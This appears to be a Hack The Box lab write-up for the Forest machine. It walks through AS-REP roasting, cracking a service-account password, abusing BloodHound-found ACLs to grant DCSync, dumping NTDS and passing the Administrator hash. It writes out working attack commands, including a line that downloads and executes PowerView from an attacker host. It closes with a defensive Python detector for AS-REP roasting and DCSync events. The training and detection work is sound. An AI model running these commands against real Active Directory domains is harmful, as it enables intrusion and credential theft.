[HTB] Forest Writeup
TL;DR
AS-REP Roasting exposed the svc-alfresco account, whose hash was cracked to recover the password s3rvice. Using this credential, WinRM access was obtained. BloodHound revealed an ACL abuse path through Account Operators group and Exchange Windows Permissions group, allowing DCSync privileges to be granted. The NTDS dump then exposed the Administrator NTLM hash, which was used to gain Domain Controller access.
1. Recon
The Nmap scan results showed that the target was a Windows Active Directory Domain Controller. Several AD-related services were exposed, including DNS, Kerberos, LDAP, SMB, and WinRM.
2. Initial Access - AS-REP Roasting
LDAP enumeration was performed without valid credentials.
└─$ nxc ldap 10.129.95.210 -u '' -p '' --users
The enumeration output disclosed multiple domain user accounts. The svc-alfresco account was identified as a valid domain user and was later confirmed to be vulnerable to AS-REP Roasting.
AS-REP Roasting is possible when Kerberos pre-authentication is disabled for a user account. In this configuration, an attacker can request an AS-REP response for the account and attempt to crack the encrypted response offline.
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.129.95.210 -request
The AS-REP hash for svc-alfresco was successfully obtained.
The recovered hash was then cracked offline using hashcat (mode 18200, Kerberos 5 AS-REP) with the rockyou.txt wordlist.
└─$ hashcat -m 18200 -a 0 asreproast.hash /usr/share/wordlists/rockyou.txt
svc-alfresco:s3rvice
The recovered credential was used to authenticate to the target through WinRM.
└─$ evil-winrm -i 10.129.95.210 -u 'svc-alfresco' -p 's3rvice'
3. Privilege Escalation - ACL Abuse to DCSync
After initial access was obtained, Active Directory enumeration was performed with BloodHound (bloodhound-python collector) using the compromised svc-alfresco credentials.
└─$ sudo bloodhound-python -u 'svc-alfresco' -p 's3rvice' -d htb.local -c All -dc forest.htb.local --zip
BloodHound identified the following privilege escalation path.
svc-alfresco
-> member of Account Operators
-> GenericAll over Exchange Windows Permissions
-> WriteDACL over htb.local domain
The svc-alfresco user was a member of the Account Operators group. This group had GenericAll privileges over the Exchange Windows Permissions group.
The Exchange Windows Permissions group had WriteDACL privileges over the htb.local domain object. Therefore, by adding svc-alfresco to Exchange Windows Permissions, it was possible to abuse WriteDACL and grant svc-alfresco DCSync rights over the domain.
First, PowerView (powerview.ps1) was loaded into memory.
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.107:80/powerview.ps1')
Then, svc-alfresco was added to the Exchange Windows Permissions group.
*Evil-WinRM* PS C:\Users\svc-alfresco> Add-DomainGroupMember -Identity 'Exchange Windows Permissions' -Members svc-alfresco
After that, a credential object was created for svc-alfresco and, using the newly abused ACL path, DCSync rights were granted to svc-alfresco.
$pass = ConvertTo-SecureString 's3rvice' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('htb\svc-alfresco', $pass)
Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity svc-alfresco -TargetIdentity 'htb.local\domain admins' -Rights DCSync
With DCSync privileges assigned, the NTDS database was dumped remotely.
└─$ nxc smb 10.129.200.15 -u svc-alfresco -p 's3rvice' --ntds
The Administrator NTLM hash was recovered from the dump.
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6::
The recovered NTLM hash was then used for Pass-the-Hash authentication over WinRM, and administrative access was successfully obtained.
└─$ evil-winrm -i 10.129.200.15 -u Administrator -H 32693b11e6aa90eb43d32c72a07ceea6
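From the defender's side, both steps of this chain leave distinct traces in the Domain Controller's Security log: the AS-REP request shows up as Event ID 4768 with no pre-authentication and RC4 encryption, and the DCSync dump as Event ID 4662 exercising a directory-replication control-access right from a non-DC account. The following is an added detection example, not code from the write-up; the event dicts use Security-log field names, and every sample event is constructed.

```python
"""Added detection example (not the write-up's own code): flag AS-REP roasting
in Event ID 4768 and DCSync in Event ID 4662. Field names follow the Security
log; every sample event below is constructed, not captured from Forest."""
from typing import Any, Dict, Iterable, List, Set, Tuple

# Well-known control-access GUIDs a DCSync request exercises on the domain object.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}

def is_asrep_roast(ev: Dict[str, Any]) -> bool:
    # 4768 = TGT request. PreAuthType 0 = no pre-authentication performed (the
    # DONT_REQ_PREAUTH condition); GetNPUsers asks for RC4 (etype 0x17) so the
    # returned AS-REP cracks quickly with hashcat mode 18200.
    return (ev.get("EventID") == 4768
            and ev.get("PreAuthType") == "0"
            and str(ev.get("TicketEncryptionType", "")).lower() == "0x17")

def is_dcsync(ev: Dict[str, Any], dc_accounts: Set[str]) -> bool:
    # 4662 = operation on an AD object. A replication control-access right is
    # normal between DC computer accounts; from svc-alfresco it is DCSync.
    if ev.get("EventID") != 4662:
        return False
    props = str(ev.get("Properties", "")).lower()
    if not any(guid in props for guid in REPLICATION_GUIDS):
        return False
    return str(ev.get("SubjectUserName", "")).upper() not in dc_accounts

def triage(events: Iterable[Dict[str, Any]], dc_accounts: Set[str]) -> List[Tuple[str, str]]:
    """Return (rule, account) pairs for every event matching a rule."""
    hits: List[Tuple[str, str]] = []
    for ev in events:
        if is_asrep_roast(ev):
            hits.append(("asrep_roast", ev["TargetUserName"]))
        elif is_dcsync(ev, dc_accounts):
            hits.append(("dcsync", ev["SubjectUserName"]))
    return hits

# Constructed sample events mirroring the write-up's chain (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-alfresco", "PreAuthType": "0",
     "TicketEncryptionType": "0x17"},                   # GetNPUsers -request
    {"EventID": 4768, "TargetUserName": "Administrator", "PreAuthType": "2",
     "TicketEncryptionType": "0x12"},                   # ordinary AES logon
    {"EventID": 4662, "SubjectUserName": "FOREST$",     # DC-to-DC replication
     "Properties": f"Control Access {{{DS_REPL_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco",  # nxc --ntds / DCSync
     "Properties": f"Control Access {{{DS_REPL_GET_CHANGES_ALL}}}"},
]
DC_ACCOUNTS = {"FOREST$"}  # computer accounts allowed to replicate
```

Running triage(SAMPLE_EVENTS, DC_ACCOUNTS) flags svc-alfresco twice, once per technique, and stays silent on the normal logon and the DC-to-DC replication.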